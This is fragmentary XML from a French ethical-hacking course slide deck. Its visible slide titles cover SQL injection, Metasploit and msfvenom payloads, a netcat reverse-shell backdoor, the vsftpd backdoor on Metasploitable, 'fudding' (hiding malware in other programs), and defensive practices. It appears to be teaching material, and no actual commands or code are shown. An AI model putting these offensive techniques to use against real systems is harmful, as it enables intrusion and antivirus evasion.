            <a:ext cx="7080834" cy="48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09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1CEDF-9526-4ED3-3DD0-A1F0592D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D1C2A-E431-3FAA-EACF-BA60B803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SECURITE DES ACCES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BCD5C1-E661-7C74-2256-F3D35FDC5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601680-1F12-E40D-E1D3-8E3091D2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9664"/>
            <a:ext cx="11008704" cy="26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5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199DE-D117-DF8D-E8AA-A5F57B02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8CF45-C08F-CEC7-B05A-1D2886C7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SECURITE DES ACCES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D1DBD-E112-597A-26A5-F5BA7FF62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FF23DB-DA67-BE30-7521-51B6DA6F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16" y="1845734"/>
            <a:ext cx="7290100" cy="50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41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F2BE1-9C25-8E68-9E70-815D40FA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intéressante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DA4946-7883-B5B7-C46B-DBF1C51D6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Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hunting</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Malware analyse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024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6F0E5-4258-6C4F-A974-3181A1AA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Certification et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> hacking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B9EB1D-1330-CFFC-85E6-DDBBBBDE2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8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944F2-E4CC-F0AF-5ECD-FB5BA2D0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MACHINES VULNERABLES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5DB5BB-C0F8-5BFF-A122-4F06098A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Difficile à trouver (création de LAB ou CTF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lien en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364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9657A-4873-853E-1D68-A72C9C85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SQL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E64104-E157-868E-C388-FD2079F5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85698"/>
            <a:ext cx="6536724" cy="314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9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94DD5-88BD-DC40-76A7-08A6F865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2DF42-0E3D-813D-9837-0AC213FC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SQL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2D6E963-9E56-A746-A6BB-773336D0A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241"/>
            <a:ext cx="12192000" cy="44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32623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852</TotalTime>
  <Words>2246</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>342</Paragraphs>
  <Slides>68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Roboto</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Rétrospective</vt:lpstr>
      <vt:lpstr>Ethical hacking Attaques/Attaquants   </vt:lpstr>
      <vt:lpstr>ON FACEBOOK CYBER SECURITY(KALI)</vt:lpstr>
      <vt:lpstr>Phase de reconnaissance  Phase de l’exploitation Phase de post-exploitation  (CYBER KILL CHAIN)</vt:lpstr>
      <vt:lpstr>Phase de reconnaissance </vt:lpstr>
      <vt:lpstr>Phase exploitation</vt:lpstr>
      <vt:lpstr>Outils de reconnaissance</vt:lpstr>
      <vt:lpstr>MACHINES VULNERABLES</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>SQL Injection (1)</vt:lpstr>
      <vt:lpstr>SQL Injection (2)</vt:lpstr>
      <vt:lpstr>Prise en main de metasploit et metasploitable</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>Payload reverse  et binding  </vt:lpstr>
      <vt:lpstr>IMPACT EXPLOITATION</vt:lpstr>
      <vt:lpstr>TEST MSFCONSOLE</vt:lpstr>
      <vt:lpstr>Msfvnom en local</vt:lpstr>
      <vt:lpstr>Msfvnom en local ou vers internet</vt:lpstr>
      <vt:lpstr>Base de donnée de CVE</vt:lpstr>
      <vt:lpstr>Programmes malveillants</vt:lpstr>
      <vt:lpstr>Programmes malveillants</vt:lpstr>
      <vt:lpstr>Reverse shell avec netcat backdoor</vt:lpstr>
      <vt:lpstr>VSFTP BACKDOOR AVEC METASPLOITABLE 2 </vt:lpstr>
      <vt:lpstr>FUDDING : Cacher les programmes malveillants dans d’autres </vt:lpstr>
      <vt:lpstr>DOCKER kali metasploitable2</vt:lpstr>
      <vt:lpstr>Pièges internautes</vt:lpstr>
      <vt:lpstr>Attaques web</vt:lpstr>
      <vt:lpstr>EXPLOITATION : COMMENT CRÉER DES FAILLES ?</vt:lpstr>
      <vt:lpstr>Cycle de vie de logiciel &amp; CVE</vt:lpstr>
      <vt:lpstr>Impact CVE et CVS</vt:lpstr>
      <vt:lpstr>Endpoint Protection Platform</vt:lpstr>
      <vt:lpstr>0-day</vt:lpstr>
      <vt:lpstr>Bonnes pratiques</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Comment améliorer la sécurité</vt:lpstr>
      <vt:lpstr>Comment améliorer la securité</vt:lpstr>
      <vt:lpstr>Domaine à sécuriser</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants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Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Mise à Jour (maj)</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SAUVEGARDE</vt:lpstr>
      <vt:lpstr>SAUVEGARDE</vt:lpstr>
      <vt:lpstr>SECURITE DES ACCES</vt:lpstr>
      <vt:lpstr>SECURITE DES ACCES</vt:lpstr>
      <vt:lpstr>Pratique intéressante</vt:lpstr>
      <vt:lpstr>Certification et lab en ethical hacking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128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-24T07:42:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-10T04:42:23Z</dcterms:modified>
</cp:coreProperties>
</file>